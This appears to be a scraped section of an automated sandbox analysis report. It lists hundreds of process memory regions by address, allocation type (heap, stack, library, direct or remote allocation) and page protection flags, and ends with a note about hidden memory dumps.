page execute and read and write
4F2A000
heap
page read and write
34CC000
stack
page read and write
F2F000
stack
page read and write
1D44000
heap
page read and write
4EDC000
heap
page read and write
4B75000
heap
page read and write
36C1000
trusted library allocation
page read and write
21D9000
trusted library allocation
page read and write
578D000
heap
page read and write
3EE000
heap
page read and write
10000
heap
page read and write
4E6A000
heap
page read and write
120000
heap
page read and write
3758000
trusted library allocation
page read and write
D4D000
stack
page read and write
203000
heap
page read and write
10000
heap
page read and write
2691000
trusted library allocation
page read and write
4EFB000
heap
page read and write
375D000
trusted library allocation
page read and write
17F000
trusted library allocation
page read and write
3CE8000
heap
page read and write
5734000
heap
page read and write
2C5D000
trusted library allocation
page read and write
4F0E000
heap
page read and write
4F48000
heap
page read and write
2C48000
trusted library allocation
page read and write
26E3000
trusted library allocation
page read and write
307000
heap
page read and write
4ED5000
heap
page read and write
520000
direct allocation
page read and write
1F77000
direct allocation
page read and write
390000
heap
page read and write
310000
heap
page read and write
1C24000
heap
page read and write
5772000
heap
page read and write
26D3000
trusted library allocation
page read and write
2F5F000
stack
page read and write
3D42000
heap
page read and write
5C4000
heap
page read and write
4BDF000
heap
page read and write
77C000
stack
page read and write
63D000
heap
page read and write
1C24B000
heap
page read and write
3A6000
heap
page read and write
3591000
trusted library allocation
page read and write
3F0000
heap
page read and write
38A000
heap
page read and write
592E000
stack
page read and write
2749000
trusted library allocation
page read and write
3B0000
trusted library allocation
page read and write
4E0000
direct allocation
page read and write
3CAC000
stack
page read and write
83CF000
stack
page read and write
52A4000
heap
page read and write
5292000
heap
page read and write
42AD000
heap
page read and write
4369000
heap
page read and write
598000
trusted library allocation
page read and write
637000
heap
page read and write
2C5A000
trusted library allocation
page read and write
1C298000
heap
page read and write
177000
trusted library allocation
page read and write
572E000
heap
page read and write
7FE8AA50000
trusted library allocation
page execute and read and write
578D000
heap
page read and write
140000
stack
page read and write
1CF7000
direct allocation
page read and write
2F40000
heap
page read and write
1B16E000
stack
page read and write
122A1000
trusted library allocation
page read and write
3E6000
heap
page read and write
1DD0000
heap
page read and write
749000
heap
page read and write
4A0000
remote allocation
page execute and read and write
1CE000
stack
page read and write
4369000
heap
page read and write
7FE8A940000
trusted library allocation
page read and write
242C000
trusted library allocation
page read and write
52A8000
heap
page read and write
48F7000
heap
page read and write
1D40000
heap
page read and write
4DF6000
heap
page read and write
1C600000
heap
page read and write
2C6000
heap
page read and write
48FD000
heap
page read and write
1D70000
direct allocation
page read and write
4DAF000
heap
page read and write
568C000
heap
page read and write
1E0000
trusted library allocation
page read and write
30D000
heap
page read and write
1CA6E000
stack
page read and write
25AD000
trusted library allocation
page read and write
21F0000
heap
page execute and read and write
2BFB000
heap
page read and write
38F000
heap
page read and write
1EF000
trusted library allocation
page read and write
2C5D000
trusted library allocation
page read and write
3E0000
heap
page read and write
4880000
heap
page read and write
20000
heap
page read and write
7FE8ABA0000
trusted library allocation
page read and write
4C2000
heap
page read and write
2D7E000
stack
page read and write
30D0000
trusted library allocation
page read and write
D0000
heap
page read and write
2C2A000
trusted library allocation
page read and write
7FE89390000
trusted library allocation
page read and write
812E000
stack
page read and write
2771000
trusted library allocation
page read and write
1EDF000
stack
page read and write
4DC1000
heap
page read and write
575F000
heap
page read and write
2C26000
trusted library allocation
page read and write
4F05000
heap
page read and write
1B230000
heap
page read and write
4040000
trusted library allocation
page read and write
460000
heap
page read and write
4E61000
heap
page read and write
84AD000
stack
page read and write
1A688000
heap
page execute and read and write
D0000
heap
page read and write
714000
heap
page read and write
83AE000
stack
page read and write
1D10000
direct allocation
page read and write
350000
heap
page read and write
3BE000
heap
page read and write
4DBC000
heap
page read and write
576A000
heap
page read and write
7FE89240000
trusted library allocation
page execute and read and write
1C4EE000
heap
page read and write
4314000
heap
page read and write
329000
stack
page read and write
3D5A000
heap
page read and write
7FE89320000
trusted library allocation
page read and write
2729000
trusted library allocation
page read and write
2181000
trusted library allocation
page read and write
1C4A2000
heap
page read and write
1D66000
heap
page read and write
20D0000
heap
page execute and read and write
7FE8AC10000
trusted library allocation
page read and write
48F7000
heap
page read and write
4F3E000
heap
page read and write
42FF000
heap
page read and write
4BB6000
heap
page read and write
797000
heap
page read and write
5650000
heap
page read and write
573E000
heap
page read and write
DE0000
heap
page execute and read and write
327000
heap
page read and write
110000
trusted library allocation
page read and write
5336000
heap
page read and write
26CD000
trusted library allocation
page read and write
385000
heap
page read and write
4C2000
heap
page read and write
4376000
heap
page read and write
7FE89370000
trusted library allocation
page read and write
35ED000
trusted library allocation
page read and write
272D000
trusted library allocation
page read and write
3DE000
heap
page read and write
5270000
heap
page read and write
279000
heap
page read and write
38AB000
stack
page read and write
3751000
trusted library allocation
page read and write
293F000
stack
page read and write
AB0000
trusted library allocation
page read and write
1B390000
heap
page read and write
5271000
heap
page read and write
3AB000
heap
page read and write
279F000
trusted library allocation
page read and write
35C000
heap
page read and write
6A0000
heap
page read and write
575C000
heap
page read and write
4F05000
heap
page read and write
52AD000
heap
page read and write
324000
heap
page read and write
26BF000
trusted library allocation
page read and write
52B1000
heap
page read and write
4DAD000
heap
page read and write
530000
heap
page read and write
5EF000
heap
page read and write
4E6A000
heap
page read and write
363000
heap
page read and write
440000
direct allocation
page read and write
2759000
trusted library allocation
page read and write
3DE000
heap
page read and write
26EB000
trusted library allocation
page read and write
320000
heap
page read and write
45A0000
heap
page read and write
2B0000
heap
page read and write
35F000
heap
page read and write
20DE000
unkown
page read and write
2C32000
trusted library allocation
page read and write
3759000
trusted library allocation
page read and write
3DA0000
heap
page read and write
52A4000
heap
page read and write
3DB000
heap
page read and write
432F000
heap
page read and write
4F1A000
heap
page read and write
4DF9000
heap
page read and write
1AF7E000
heap
page read and write
26C1000
trusted library allocation
page read and write
7FE89140000
trusted library allocation
page execute and read and write
3F80000
heap
page read and write
33B0000
remote allocation
page read and write
E30000
trusted library allocation
page execute and read and write
529E000
stack
page read and write
26B7000
trusted library allocation
page read and write
3CDF000
heap
page read and write
4F47000
heap
page read and write
4F66000
heap
page read and write
47C1000
heap
page read and write
3751000
trusted library allocation
page read and write
352000
trusted library allocation
page read and write
38A000
heap
page read and write
DC000
stack
page read and write
2705000
trusted library allocation
page read and write
2C53000
trusted library allocation
page read and write
346000
heap
page read and write
7FE8AB40000
trusted library allocation
page read and write
3CBC000
heap
page read and write
152000
trusted library allocation
page read and write
4F03000
heap
page read and write
85AF000
stack
page read and write
4EBC000
heap
page read and write
4ED7000
heap
page read and write
7FE8A94B000
trusted library allocation
page read and write
500000
trusted library allocation
page read and write
FD0000
heap
page execute and read and write
49B000
direct allocation
page read and write
4F5B000
heap
page read and write
4F43000
heap
page read and write
3CED000
heap
page read and write
5539000
heap
page read and write
1A820000
heap
page read and write
10000
heap
page read and write
3751000
trusted library allocation
page read and write
4F2A000
heap
page read and write
1C595000
heap
page read and write
4DD4000
heap
page read and write
5762000
heap
page read and write
4D2000
heap
page read and write
275D000
trusted library allocation
page read and write
5734000
heap
page read and write
9E000
heap
page read and write
1C2C5000
heap
page read and write
432C000
heap
page read and write
3CB0000
heap
page read and write
41F0000
heap
page read and write
3D87000
heap
page read and write
568C000
heap
page read and write
362000
heap
page read and write
375D000
trusted library allocation
page read and write
37B000
heap
page read and write
EC0000
unkown
page readonly
3F0000
heap
page read and write
480000
direct allocation
page read and write
298000
stack
page read and write
5C7000
heap
page read and write
18A000
trusted library allocation
page execute and read and write
2C2F000
trusted library allocation
page read and write
4F3E000
heap
page read and write
3A40000
trusted library allocation
page read and write
2795000
trusted library allocation
page read and write
1B2F0000
heap
page read and write
26A9000
trusted library allocation
page read and write
248B000
heap
page read and write
22F0000
heap
page read and write
51D4000
heap
page read and write
7FE892E0000
trusted library allocation
page read and write
525D000
heap
page read and write
1B41C000
stack
page read and write
35D3000
trusted library allocation
page read and write
7FE8AA16000
trusted library allocation
page execute and read and write
5335000
heap
page read and write
3D87000
heap
page read and write
47C2000
heap
page read and write
2735000
trusted library allocation
page read and write
616000
heap
page read and write
310000
heap
page read and write
4F43000
heap
page read and write
51A3000
heap
page read and write
3CDD000
stack
page read and write
4ECF000
heap
page read and write
4BE000
heap
page read and write
4AAF000
stack
page read and write
4EBC000
heap
page read and write
4F10000
heap
page read and write
3DB000
heap
page read and write
2A7F000
stack
page read and write
52C5000
heap
page read and write
45A9000
heap
page read and write
29C000
heap
page read and write
4F7000
heap
page read and write
34A000
trusted library allocation
page execute and read and write
7FE892B0000
trusted library allocation
page read and write
375D000
trusted library allocation
page read and write
52B1000
heap
page read and write
2A64000
heap
page read and write
3DAE000
heap
page read and write
48F9000
heap
page read and write
4301000
heap
page read and write
3D2F000
heap
page read and write
2793000
trusted library allocation
page read and write
3B90000
trusted library allocation
page read and write
4F1A000
heap
page read and write
436C000
heap
page read and write
38E000
heap
page read and write
354000
heap
page read and write
2C25000
trusted library allocation
page read and write
5729000
heap
page read and write
4D36000
heap
page read and write
22C000
heap
page read and write
330000
trusted library allocation
page read and write
5780000
heap
page read and write
359000
heap
page read and write
2C2D000
trusted library allocation
page read and write
7FE893E0000
trusted library allocation
page read and write
84E000
unkown
page read and write
440E000
stack
page read and write
2E1C000
stack
page read and write
C20000
heap
page read and write
5780000
heap
page read and write
26AF000
trusted library allocation
page read and write
2C51000
trusted library allocation
page read and write
385000
heap
page read and write
4F3E000
heap
page read and write
4F08000
heap
page read and write
37F000
heap
page read and write
37CC000
trusted library allocation
page read and write
3751000
trusted library allocation
page read and write
5FC000
heap
page read and write
27F000
stack
page read and write
276F000
trusted library allocation
page read and write
431E000
heap
page read and write
1182000
unkown
page execute read
2787000
trusted library allocation
page read and write
4F66000
heap
page read and write
25DA000
stack
page read and write
4F66000
heap
page read and write
397000
heap
page read and write
3D9B000
heap
page read and write
4F45000
heap
page read and write
3758000
trusted library allocation
page read and write
864F000
stack
page read and write
2737000
trusted library allocation
page read and write
3DD000
heap
page read and write
8B000
stack
page read and write
35F0000
trusted library allocation
page execute
12181000
trusted library allocation
page read and write
528D000
heap
page read and write
3D89000
heap
page read and write
5766000
heap
page read and write
857000
heap
page read and write
2C5A000
trusted library allocation
page read and write
4F10000
heap
page read and write
7E0D000
stack
page read and write
4F08000
heap
page read and write
F2E000
stack
page read and write | page guard
26D9000
trusted library allocation
page read and write
1F00000
heap
page read and write
3D7B000
heap
page read and write
3D87000
heap
page read and write
4F31000
heap
page read and write
2BC5000
heap
page read and write
2761000
trusted library allocation
page read and write
42F000
heap
page read and write
1A720000
heap
page execute and read and write
206F000
stack
page read and write
2755000
trusted library allocation
page read and write
35A000
heap
page read and write
5214000
heap
page read and write
4ED5000
heap
page read and write
7FE89130000
trusted library allocation
page read and write
3E1000
heap
page read and write
1F70000
direct allocation
page read and write
3DA0000
heap
page read and write
1E50000
heap
page read and write
2B8000
heap
page read and write
1B5BE000
stack
page read and write
4F0E000
heap
page read and write
B70000
trusted library allocation
page read and write
EC2000
unkown
page execute read
4F45000
heap
page read and write
81DE000
stack
page read and write
1B22E000
stack
page read and write
7D9F000
stack
page read and write
14A000
trusted library allocation
page execute and read and write
25C000
stack
page read and write
12D000
trusted library allocation
page execute and read and write
4F5B000
heap
page read and write
2C30000
trusted library allocation
page read and write
3D55000
heap
page read and write
26F9000
trusted library allocation
page read and write
7FE8AAF0000
trusted library allocation
page execute and read and write
7FE8AC80000
trusted library allocation
page read and write
3BE000
heap
page read and write
5290000
heap
page read and write
4F66000
heap
page read and write
4F2A000
heap
page read and write
3751000
trusted library allocation
page read and write
2D83000
trusted library allocation
page read and write
2DF0000
heap
page read and write
12280000
trusted library allocation
page read and write
7FE8A932000
trusted library allocation
page read and write
52AA000
heap
page read and write
3DA0000
heap
page read and write
5055000
heap
page read and write
4F05000
heap
page read and write
39C000
heap
page read and write
290000
heap
page read and write
39C0000
trusted library allocation
page read and write
26BB000
trusted library allocation
page read and write
539F000
heap
page read and write
1B0000
trusted library allocation
page read and write
5535000
heap
page read and write
2785000
trusted library allocation
page read and write
5A0000
heap
page read and write
58BE000
stack
page read and write
26A1000
trusted library allocation
page read and write
375D000
trusted library allocation
page read and write
38D000
heap
page read and write
3FA000
stack
page read and write
52A8000
heap
page read and write
192000
trusted library allocation
page read and write
5347000
heap
page read and write
3BF000
heap
page read and write
1A824000
heap
page read and write
3758000
trusted library allocation
page read and write
524A000
heap
page read and write
268F000
trusted library allocation
page read and write
26D7000
trusted library allocation
page read and write
4360000
trusted library section
page read and write
34E2000
trusted library allocation
page read and write
896E000
stack
page read and write
487000
direct allocation
page read and write
3DA0000
heap
page read and write
4F40000
heap
page read and write
590000
heap
page read and write
3453000
direct allocation
page read and write
5D4000
heap
page read and write
1B326000
heap
page read and write
4ED5000
heap
page read and write
1C36F000
stack
page read and write
1C2E6000
heap
page read and write
660000
heap
page read and write
4BE000
heap
page read and write
4F45000
heap
page read and write
7FE89310000
trusted library allocation
page read and write
370F000
trusted library allocation
page read and write
3D99000
heap
page read and write
2C32000
trusted library allocation
page read and write
3D9C000
heap
page read and write
3CEA000
heap
page read and write
51B0000
heap
page read and write
640000
heap
page read and write
4E3A000
heap
page read and write
3D37000
heap
page read and write
4F2F000
heap
page read and write
1ABCB000
stack
page read and write
363000
heap
page read and write
3763000
trusted library allocation
page read and write
270F000
trusted library allocation
page read and write
2C5D000
trusted library allocation
page read and write
2799000
trusted library allocation
page read and write
4F3A000
heap
page read and write
4D2000
heap
page read and write
4E65000
heap
page read and write
5736000
heap
page read and write
3A00000
trusted library allocation
page read and write
695000
heap
page read and write
261F000
stack
page read and write
2791000
trusted library allocation
page read and write
844E000
stack
page read and write
568E000
stack
page read and write
4F70000
heap
page execute and read and write
2693000
trusted library allocation
page read and write
7FE8A9E6000
trusted library allocation
page read and write
4E63000
heap
page read and write
180000
heap
page read and write
2779000
trusted library allocation
page read and write
35A000
heap
page read and write
1C49A000
heap
page read and write
10000
heap
page read and write
5C0000
heap
page read and write
2733000
trusted library allocation
page read and write
270000
heap
page read and write
48F3000
heap
page read and write
3E9000
heap
page read and write
529A000
heap
page read and write
4F47000
heap
page read and write
4E65000
heap
page read and write
2C32000
trusted library allocation
page read and write
375D000
trusted library allocation
page read and write
4F5B000
heap
page read and write
815E000
stack
page read and write
3EE000
heap
page read and write
4F66000
heap
page read and write
22C000
heap
page read and write
576A000
heap
page read and write
7FE8AB00000
trusted library allocation
page execute and read and write
3BE000
heap
page read and write
4DC1000
heap
page read and write
850000
heap
page read and write
52AF000
heap
page read and write
7FE89237000
trusted library allocation
page read and write
1A7A7000
heap
page read and write
4F2E000
heap
page read and write
279000
heap
page read and write
578D000
heap
page read and write
10000
heap
page read and write
1D0000
trusted library allocation
page read and write
4F10000
heap
page read and write
2C5D000
trusted library allocation
page read and write
35C000
heap
page read and write
182000
trusted library allocation
page read and write
4F0E000
heap
page read and write
512000
heap
page read and write
1C291000
heap
page read and write
1B5C0000
heap
page read and write
7FE8AAE7000
trusted library allocation
page read and write
550000
heap
page read and write
2F1F000
stack
page read and write
1C25F000
stack
page read and write
4B0000
heap
page read and write
4F0E000
heap
page read and write
52B0000
heap
page read and write
3D5A000
heap
page read and write
2F9000
heap
page read and write
4CF0000
heap
page read and write
576A000
heap
page read and write
322000
heap
page read and write
329000
heap
page read and write
34D3000
trusted library allocation
page read and write
627000
heap
page read and write
4EF000
stack
page read and write
2BAF000
stack
page read and write
475A000
heap
page read and write
1D00000
heap
page read and write
6A7000
heap
page read and write
51FC000
heap
page read and write
1A6BE000
heap
page execute and read and write
4AF1000
heap
page read and write
33A0000
direct allocation
page read and write
1D50000
heap
page read and write
7FCE000
stack
page read and write
21B000
heap
page read and write
109E000
stack
page read and write
42B9000
heap
page read and write
3CE8000
heap
page read and write
120000
trusted library allocation
page read and write
64B000
heap
page read and write
7E3E000
stack
page read and write
3505000
trusted library allocation
page read and write
552B000
heap
page read and write
26C9000
trusted library allocation
page read and write
7FE893B0000
trusted library allocation
page read and write
26CF000
trusted library allocation
page read and write
2675000
trusted library allocation
page read and write
35A000
heap
page read and write
4ED9000
heap
page read and write
27A3000
trusted library allocation
page read and write
32C000
heap
page read and write
7FE8AB30000
trusted library allocation
page read and write
51C000
stack
page read and write
1C480000
heap
page read and write
1D54000
heap
page read and write
5727000
heap
page read and write
1D90000
direct allocation
page read and write
27C0000
trusted library allocation
page read and write
7FE89360000
trusted library allocation
page read and write
1BA000
stack
page read and write
ED0000
heap
page read and write
3758000
trusted library allocation
page read and write
4F54000
heap
page read and write
7FE89330000
trusted library allocation
page read and write
2717000
trusted library allocation
page read and write
576D000
heap
page read and write
3D77000
heap
page read and write
7FE89300000
trusted library allocation
page read and write
17D000
trusted library allocation
page execute and read and write
51E8000
heap
page read and write
439F000
heap
page read and write
7FE8AC00000
trusted library allocation
page read and write
27CD000
trusted library allocation
page read and write
26A7000
trusted library allocation
page read and write
5772000
heap
page read and write
3751000
trusted library allocation
page read and write
5EE000
stack
page read and write
2679000
trusted library allocation
page read and write
3DE000
heap
page read and write
13D000
trusted library allocation
page execute and read and write
3E9000
heap
page read and write
4E06000
heap
page read and write
61E000
heap
page read and write
342000
trusted library allocation
page read and write
2C32000
trusted library allocation
page read and write
52A8000
heap
page read and write
27BD000
trusted library allocation
page read and write
5204000
heap
page read and write
31A1000
trusted library allocation
page read and write
4EFD000
heap
page read and write
2C52000
trusted library allocation
page read and write
2765000
trusted library allocation
page read and write
36B1000
trusted library allocation
page read and write
2747000
trusted library allocation
page read and write
7FE89090000
trusted library allocation
page read and write
EC0000
unkown
page readonly
1A7000
heap
page read and write
2800000
heap
page read and write
3B0000
heap
page read and write
278D000
trusted library allocation
page read and write
6FC000
stack
page read and write
5721000
heap
page read and write
2FC0000
trusted library allocation
page read and write
1B266000
heap
page read and write
5131000
heap
page read and write
3751000
trusted library allocation
page read and write
1B22E000
stack
page read and write
3D90000
heap
page read and write
4F39000
heap
page read and write
2C2D000
trusted library allocation
page read and write
3745000
trusted library allocation
page read and write
26EF000
trusted library allocation
page read and write
1FC4000
heap
page read and write
4F66000
heap
page read and write
578D000
heap
page read and write
7FE89233000
trusted library allocation
page read and write
3E0000
heap
page read and write
3DAE000
heap
page read and write
3758000
trusted library allocation
page read and write
4F1A000
heap
page read and write
1B2E4000
heap
page read and write
4A72000
heap
page read and write
2EE000
heap
page read and write
7FE8AC30000
trusted library allocation
page read and write
48F4000
heap
page read and write
48F0000
heap
page read and write
43D1000
trusted library allocation
page read and write
7FE8AC40000
trusted library allocation
page read and write
5BD000
heap
page read and write
4BDE000
heap
page read and write
4D4C000
heap
page read and write
7FE89083000
trusted library allocation
page execute and read and write
4F66000
heap
page read and write
3CE8000
heap
page read and write
7D4E000
stack
page read and write
2C5A000
trusted library allocation
page read and write
3DC000
heap
page read and write
7FE8AC70000
trusted library allocation
page read and write
20000
heap
page read and write
2271000
trusted library allocation
page read and write
385000
heap
page read and write
4834000
heap
page read and write
800E000
stack
page read and write
7FE89284000
trusted library allocation
page read and write
4F24000
heap
page read and write
2613000
trusted library allocation
page read and write
62D000
heap
page read and write
3751000
trusted library allocation
page read and write
4D89000
heap
page read and write
337C000
stack
page read and write
710000
heap
page read and write
4F1A000
heap
page read and write
2452000
trusted library allocation
page read and write
2C4A000
trusted library allocation
page read and write
42AC000
heap
page read and write
1C43B000
stack
page read and write
2783000
trusted library allocation
page read and write
568C000
heap
page read and write
5764000
heap
page read and write
10000
heap
page read and write
56DE000
stack
page read and write
852E000
stack
page read and write
3D9E000
heap
page read and write
4ED7000
heap
page read and write
170000
trusted library allocation
page read and write
1F77000
direct allocation
page read and write
4F45000
heap
page read and write
49F000
remote allocation
page execute and read and write
5335000
heap
page read and write
31C000
heap
page read and write
52A4000
heap
page read and write
5764000
heap
page read and write
170000
trusted library allocation
page read and write
53D0000
heap
page read and write
193000
stack
page read and write
A50000
trusted library allocation
page execute and read and write
4701000
heap
page read and write
934000
heap
page read and write
20000
heap
page read and write
550E000
stack
page read and write
69B000
heap
page read and write
5772000
heap
page read and write
2713000
trusted library allocation
page read and write
34D5000
trusted library allocation
page read and write
4F3E000
heap
page read and write
899E000
stack
page read and write | page guard
3D79000
heap
page read and write
21DE000
stack
page read and write
26DB000
trusted library allocation
page read and write
4836000
heap
page read and write
2753000
trusted library allocation
page read and write
38F000
heap
page read and write
4DCD000
heap
page read and write
26E5000
trusted library allocation
page read and write
273D000
trusted library allocation
page read and write
1EC0000
direct allocation
page read and write
4E31000
heap
page read and write
3632000
trusted library allocation
page read and write
3D55000
heap
page read and write
25C3000
trusted library allocation
page read and write
48F9000
heap
page read and write
3D42000
heap
page read and write
7FE8AAD0000
trusted library allocation
page read and write
22C000
heap
page read and write
3D5C000
heap
page read and write
432C000
heap
page read and write
39BF000
stack
page read and write
490000
heap
page read and write
4F43000
heap
page read and write
26B5000
trusted library allocation
page read and write
52A8000
heap
page read and write
7FE8AB34000
trusted library allocation
page read and write
7FE8AB14000
trusted library allocation
page read and write
4F24000
heap
page read and write
23F000
stack
page read and write
4F7000
heap
page read and write
124000
heap
page read and write
4A1F000
stack
page read and write
290000
heap
page read and write
3745000
trusted library allocation
page read and write
1DC000
stack
page read and write
7FE8A9F0000
trusted library allocation
page execute and read and write
38A000
heap
page read and write
38D000
heap
page read and write
3DAF000
heap
page read and write
5F6000
heap
page read and write
4701000
heap
page read and write
10000
heap
page read and write
355000
heap
page read and write
4F49000
heap
page read and write
2361000
trusted library allocation
page read and write
271F000
trusted library allocation
page read and write
897000
heap
page read and write
4F3E000
heap
page read and write
3751000
trusted library allocation
page read and write
4EBC000
heap
page read and write
7FE8AB50000
trusted library allocation
page read and write
35FD000
trusted library allocation
page read and write
5770000
heap
page read and write
273000
heap
page read and write
52AA000
heap
page read and write
432F000
heap
page read and write
512000
heap
page read and write
38A000
heap
page read and write
4F54000
heap
page read and write
2C2D000
trusted library allocation
page read and write
4F3E000
heap
page read and write
55A0000
heap
page read and write
BCF000
stack
page read and write
7FE8AB80000
trusted library allocation
page read and write
489E000
stack
page read and write
5239000
heap
page read and write
500000
trusted library allocation
page read and write
3758000
trusted library allocation
page read and write
2581000
trusted library allocation
page read and write
18B000
stack
page read and write
3AB000
heap
page read and write
3CBC000
heap
page read and write
2CE000
stack
page read and write
2C5A000
trusted library allocation
page read and write
10000
heap
page read and write
26D5000
trusted library allocation
page read and write
3440000
direct allocation
page read and write
4E50000
heap
page execute and read and write
116000
heap
page read and write
DEE000
stack
page read and write
3D2F000
heap
page read and write
7FE89380000
trusted library allocation
page read and write
10000
heap
page read and write
34D7000
trusted library allocation
page read and write
3BE000
heap
page read and write
850000
heap
page read and write
7D0000
heap
page read and write
7FE8AC50000
trusted library allocation
page read and write
5277000
heap
page read and write
142000
heap
page read and write
2741000
trusted library allocation
page read and write
3745000
trusted library allocation
page read and write
4F05000
heap
page read and write
4D74000
heap
page read and write
553C000
heap
page read and write
39C000
heap
page read and write
4F5B000
heap
page read and write
273B000
trusted library allocation
page read and write
4110000
trusted library allocation
page read and write
7D9000
heap
page read and write
275B000
trusted library allocation
page read and write
429F000
stack
page read and write
1C5B000
heap
page read and write
240000
heap
page read and write
4ECF000
heap
page read and write
22A0000
trusted library allocation
page execute read
670000
heap
page read and write
2741000
trusted library allocation
page read and write
1C501000
heap
page read and write
3D97000
heap
page read and write
5734000
heap
page read and write
38A000
heap
page read and write
740000
heap
page read and write
48F9000
heap
page read and write
2EF000
heap
page read and write
2C29000
trusted library allocation
page read and write
273F000
trusted library allocation
page read and write
268B000
trusted library allocation
page read and write
30B0000
trusted library allocation
page execute
7FE89262000
trusted library allocation
page read and write
1D60000
heap
page read and write
4F49000
heap
page read and write
373F000
trusted library allocation
page read and write
4F03000
heap
page read and write
4EAE000
stack
page read and write
12190000
trusted library allocation
page read and write
7FE8ABE0000
trusted library allocation
page read and write
49F000
heap
page read and write
5688000
heap
page read and write
4F54000
heap
page read and write
5AA000
heap
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
7FE8AB20000
trusted library allocation
page execute and read and write
123000
trusted library allocation
page execute and read and write
120000
trusted library allocation
page read and write
4733000
heap
page read and write
26C7000
trusted library allocation
page read and write
578D000
heap
page read and write
2745000
trusted library allocation
page read and write
44CE000
stack
page read and write
270D000
trusted library allocation
page read and write
2751000
trusted library allocation
page read and write
81AE000
stack
page read and write
380000
trusted library allocation
page read and write
220000
trusted library allocation
page read and write
1A999000
stack
page read and write
37DC000
trusted library allocation
page read and write
4F47000
heap
page read and write
4B75000
heap
page read and write
270F000
stack
page read and write
7FE8AC90000
trusted library allocation
page read and write
E2F000
stack
page read and write
7FE8ABB0000
trusted library allocation
page read and write
1AFB0000
heap
page read and write
85AE000
stack
page read and write | page guard
1AC58000
stack
page read and write
3E9000
heap
page read and write
4F45000
heap
page read and write
3662000
trusted library allocation
page read and write
1CB6C000
stack
page read and write
260000
heap
page read and write
4F24000
heap
page read and write
3751000
trusted library allocation
page read and write
4E6C000
heap
page read and write
58E000
stack
page read and write
266E000
trusted library allocation
page read and write
385000
heap
page read and write
10000
heap
page read and write
3D55000
heap
page read and write
4E3D000
stack
page read and write
840000
heap
page read and write
7FE8AC20000
trusted library allocation
page read and write
1AB28000
stack
page read and write
437D000
heap
page read and write
3751000
trusted library allocation
page read and write
875E000
stack
page read and write
4F10000
heap
page read and write
10000
heap
page read and write
3652000
trusted library allocation
page read and write
4D73000
heap
page read and write
1A680000
heap
page execute and read and write
277F000
trusted library allocation
page read and write
269B000
trusted library allocation
page read and write
3690000
heap
page read and write
4E90000
heap
page read and write
3130000
heap
page read and write
2785000
trusted library allocation
page read and write
1DB000
stack
page read and write
4F54000
heap
page read and write
422000
heap
page read and write
4F54000
heap
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
5298000
heap
page read and write
38E000
heap
page read and write
2C55000
trusted library allocation
page read and write
1B399000
heap
page read and write
4D74000
heap
page read and write
7FE89250000
trusted library allocation
page execute and read and write
1A89F000
heap
page read and write
ED4000
heap
page read and write
3DE000
heap
page read and write
49F000
direct allocation
page read and write
4AC000
heap
page read and write
5204000
heap
page read and write
2727000
trusted library allocation
page read and write
515E000
stack
page read and write
2C21000
trusted library allocation
page read and write
48F3000
heap
page read and write
55C7000
heap
page read and write
2619000
trusted library allocation
page read and write
42FF000
heap
page read and write
7FE8AB70000
trusted library allocation
page read and write
396000
heap
page read and write
38F000
heap
page read and write
2B10000
trusted library allocation
page execute read
521E000
stack
page read and write
4EDB000
heap
page read and write
7FE89093000
trusted library allocation
page read and write
4F39000
heap
page read and write
43C5000
trusted library allocation
page read and write
4759000
heap
page read and write
37B000
heap
page read and write
2C29000
trusted library allocation
page read and write
547000
heap
page read and write
4B7000
heap
page read and write
26FD000
trusted library allocation
page read and write
27A9000
trusted library allocation
page read and write
1FC0000
heap
page read and write
1C2C7000
heap
page read and write
4F7000
heap
page read and write
1A89D000
heap
page read and write
5668000
heap
page read and write
42BA000
heap
page read and write
1C2A9000
heap
page read and write
5539000
heap
page read and write
375D000
trusted library allocation
page read and write
4F66000
heap
page read and write
3D5A000
heap
page read and write
209000
heap
page read and write
4F2F000
heap
page read and write
26ED000
trusted library allocation
page read and write
529A000
heap
page read and write
238B000
trusted library allocation
page read and write
38B000
heap
page read and write
3B10000
heap
page read and write
270B000
trusted library allocation
page read and write
375D000
trusted library allocation
page read and write
528C000
heap
page read and write
2C32000
trusted library allocation
page read and write
565E000
heap
page read and write
5050000
heap
page read and write
1C4D8000
heap
page read and write
259D000
trusted library allocation
page read and write
1D96000
heap
page read and write
4BE000
stack
page read and write
4F08000
heap
page read and write
7FE893C0000
trusted library allocation
page read and write
4F2A000
heap
page read and write
1B7BC000
stack
page read and write
385000
heap
page read and write
There are 1951 hidden memdumps, click here to show them.